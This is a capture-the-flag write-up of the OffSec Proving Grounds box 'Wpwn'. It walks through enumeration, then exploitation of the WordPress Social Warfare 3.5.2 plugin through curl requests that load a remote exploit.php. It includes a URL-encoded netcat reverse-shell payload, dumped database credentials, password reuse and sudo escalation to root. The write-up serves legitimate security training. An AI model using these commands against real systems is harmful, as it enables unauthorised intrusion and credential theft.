Proving Grounds | Wpwn

Hi amazing hackers from around the world, back again with another write up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to check out more write ups please do check my GitLab repository

Try harder! Credits to Offensive Security

Enumeration

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Basic information that you’ll get.

Web

  • Apache 2.4.38
  • WordPress 5.5
  • robots.txt contains :
/secret -> 404
# haha, just kidding. Focus on real stuff ma boi

Looks like it’s just a fake robots.txt, that’s fine keep enumerating!

FeroxBuster

FeroxBuster is a tool to discover directories and files on a server, it’s pretty similar to GoBuster but it’s much more faster and it has emojis!

  • Found /wordpress
200        3l        5w       23c http://192.168.85.123/
301 9l 28w 320c http://192.168.85.123/wordpress
  • Now that we know we’re running WordPress we can run another tool.

WPSCAN

wpscan is a tool made by wpscanteam to enumerate and test the security of the CMS WordPress.

  • 1 user identified, admin
  • Plugins detected social-warfare version 3.5.2

Exploit

Now we have some information of our target, lets do some research!

curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"
  • We’ll see the hostname in the response
wpwn
<!DOCTYPE html>
<html lang="en-US">
<head>
  • Let’s get a reverse shell.
  • Payload needs to be URL encoded.
    rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"pwncat is a tool similar to netcat, but it has more features than netcat.[15:09:39] Welcome to pwncat 🐈!                                                                      __main__.py:153
[15:10:28] received connection from 192.168.85.123:54858 bind.py:76
[15:10:31] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:504
[15:10:34] 192.168.85.123:54858: registered new host w/ db

Privilege Escalation

Now that we have a shell in the machine, it’s time to escalate our privileges!

  • We are user www-data, need password for sudo -l
  • Found MySQL credentials for DB.
/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
wp_user:R3&]vzhHmMn9,:-5
  • Found hash for admin in wp_users table.
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
+------------+------------------------------------+
  • Hash is Wordpress, mode 400
  • While we’re trying to crack the password, we should look around more.
  • Found local.txt in /var/www
    80d2c0fa4fec51cad65e486bbecf34ab

One thing that I like to check is that usually the DB password is reused for the user password

  • We have one user which is takis
  • DB password is reused for user takis. We are now user takis.
  • Check sudo -l
User takis may run the following commands on wpwn:     (ALL) NOPASSWD: ALL

We’ll look at that, we don’t even need to find another vector to escalate to root.

  • We can run sudo on anything, run sudo bash to gain root privileges.
  • proof.txt in /root
    a6f62db372a1a76f723cc2a8e1594ec6

And that’s all we’re root!

Student that loves FOSS